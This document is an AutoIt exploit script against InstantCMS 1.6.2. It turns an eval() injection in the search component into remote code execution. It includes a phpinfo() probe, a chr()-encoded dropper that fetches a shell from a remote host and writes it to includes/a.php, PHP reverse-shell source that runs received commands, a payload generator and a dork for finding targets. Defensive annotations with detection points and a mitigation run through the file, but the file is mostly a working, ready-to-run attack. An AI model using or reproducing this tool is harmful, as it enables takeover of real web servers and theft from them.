#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=exploit.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Inet.au3>
#include <String.au3>
#cs
Demo vid: http://youtu.be/j_RIPh-nYpY
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png
Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip
Or:
http://www.instantcms.ru/download.html
Dork: InstantCMS © 2007-2010
In the wild I found 1.7 versions which are vulnerable too.
<?php
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php
/*********************************************************************************************/
// //
// InstantCMS v1.6 (c) 2010 FREEWARE //
// http://www.instantcms.ru/, info@instantcms.ru //
// //
// written by Vladimir E. Obukhov, 2007-2010 //
// //
/*********************************************************************************************/
// SNIP//
// $look and $query arrive with the search request (the ?query=...&look=... parameters
// shown in the write-up below).  'phrase' mode wraps the query in backslash-escaped
// double quotes: in a single-quoted PHP string '\"' stays as the two characters \" so
// they survive inside the double-quoted argument that eval() builds further down.
// Nothing here neutralises the `${...}` syntax that the write-up's payload relies on.
if ($look == 'phrase'){
$against .= '\"'.$query.'\"';
}
//RUN SEARCH PROCESSORS
//get list of components and look for search processor in component folder
$sql = "SELECT link FROM cms_components";
$rs = $inDB->query($sql) ;
if ($inDB->num_rows($rs)){
while ($component = $inDB->fetch_assoc($rs)){
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';
if (file_exists($spfile)){
// Non-strict in_array(); harmless here only if $cfg['comp'] holds plain strings.
if (in_array($component['link'], $cfg['comp'])){
include $spfile;
// VULNERABLE: request-controlled $against, $look and $mode are pasted into PHP source
// text and evaluated, so their content is parsed as code rather than passed as data.
// Mitigation: remove eval() and invoke the processor directly, e.g.
//   call_user_func('search_'.$component['link'], $against, $look, $mode);
// which hands the values over as plain strings, after checking the target with
// function_exists().  Until then, any '${' in a search query is worth alerting on.
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');
}
}
}
}
// EOF SNIP //
Notice: the eval() construction.
Exploitation:
Payload: ${echo phpinfo()}
site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords
Drop shell?NP.
=======================================================================================
<?php
/*
Simple Payload generator
Rewrites a string as a chain of chr(<byte>) calls joined with '.', so the result
contains no quote characters and can sit inside the eval()'d double-quoted argument
quoted above.  For defenders: a long run of chr(NNN).chr(NNN) inside a search query
parameter is a reliable signature of this technique (compare the $kissyou value in
the AutoIt code below).
*/
$str='http://search.tld/andfind.txt';// URL the dropper will fetch the shell from; a host the attacker controls //
echo '<pre>' . PHP_EOL;
for($z=0;$z<=strlen($str)-1;$z++)
{
// Last byte gets no trailing '.' separator.  Both ternary branches perform an
// assignment; a plain if/else would say the same thing more clearly.
$z==strlen($str)-1 ? $plg='chr(' . ord(substr($str,$z,1)) .')' : $plg='chr(' . ord(substr($str,$z,1)) .')' . '.';echo $plg;
}?>
=======================================================================================
Then drop it in the following way:
${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}
As reverse shell uses:
<?php
// The file the AutoIt script below writes to includes/a.php.  What the code does:
//  - error_reporting(0) / set_time_limit(0): hide notices and let the request run
//    for as long as the connection lasts
//  - connects back to the requesting client's own address (REMOTE_ADDR) on the port
//    formed by the digits of the client's User-Agent header; a User-Agent with no
//    digits makes it print the literal '<!-- Welcome BH -->' instead, which the
//    AutoIt code treats as "file is present and executing"
//  - every line received on the socket is run through the backtick (shell) operator
// Detection points: an unexpected includes/a.php, an outbound TCP connection from
// the web server process to a web client's address, requests whose User-Agent is
// only digits (or has none), and that marker string in a response.
error_reporting(0);
set_time_limit(0);
$ip=trim((string)$_SERVER['REMOTE_ADDR']);
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);
if (empty($port)){ die('<!-- Welcome BH -->');}
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);
// $hello is appended to before it is defined; the resulting notice is hidden by error_reporting(0).
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));
while($alive=@socket_read($socket, 31337))
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);
#ce
; Usage text shown when the two required arguments (site URL, listener port) are missing.
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF
; Browser-like User-Agent with every digit removed.  The dropped PHP (quoted in the header
; comment) derives its connect-back port from the digits of the User-Agent, so a digit-free
; UA makes it answer with the marker string instead of connecting out.  A UA shaped like
; this is itself an indicator worth alerting on.
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';
; Search URL with a placeholder ('Shoutz)') that is swapped for the payload per request.
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';
; Dropper payload.  The chr() chains encode the local path includes/a.php and the remote
; URL the shell is fetched from, so the query string carries no quote characters.
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';
; Literal the dropped shell prints when the User-Agent carries no port digits.
$pissagainst_wind='<!-- Welcome BH -->';
; Separator line for console output.
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
#cs
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));
exit;
#ce
ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _
'# *Via Reverse Shell* #' & @CRLF & _
'# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _
'# /AkaStep #' & $triptrop)
if $CmdLine[0] <> 2 Then
;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf
$rsite=$CmdLine[1];
; The second argument is sent verbatim as the User-Agent of the final request; the shell
; takes the digits from it as the port to connect back to.
$PayloadUA=$CmdLine[2];
ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop);
; Check request: the search page is fetched with a phpinfo() payload and the reply is
; searched for 'allow_url_fopen' (a phpinfo() table row).  Server-side this is a search
; query containing '${', which is the simplest thing to log or block.
HttpSetUserAgent($fakeua);
$isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True);
if StringInStr($isvulnerable,'allow_url_fopen') Then
ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop);
Else
ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop);
exit;
EndIf
#cs
Time to get a reverse shell!
First we'll drop our shell as includes/a.php
Then we'll check for the shell's existence.
If it exists then we'll try to back-connect to us.
${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords
#ce
#cs
EXPLOITING!
#ce
; Dropper request: 'Shoutz)' is replaced by the file_put_contents payload above.  The
; file write only succeeds if the web server user can create files under includes/,
; so a read-only document root defeats this step.
HttpSetUserAgent($fakeua)
InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1)
sleep(Random(1500,3000,1));// random sleep of a few seconds
#cs
Now checking for existence of our dropped shell.
#ce
; includes/a.php is fetched with the digit-free UA; the marker string in the reply
; is taken as proof that the file was written and is being executed.
HttpSetUserAgent($fakeua)
$dont=_INetGetSource($rsite & '/includes/a.php',True)
if StringInStr($dont,$pissagainst_wind) Then
ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop)
Else
ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop);
exit;
EndIf
#cs
And Finally Getting Reverse Shell
#ce
; Final request with the listener port in the User-Agent.  The extra trailing 1 passed to
; InetGet presumably makes the download run in the background (confirm against the AutoIt
; docs), since this request stays open for the life of the shell session.
HttpSetUserAgent($PayloadUA)
InetGet($rsite & '/includes/a.php','',1,1)
ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop);
exit;
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
================================================
/AkaStep
#ce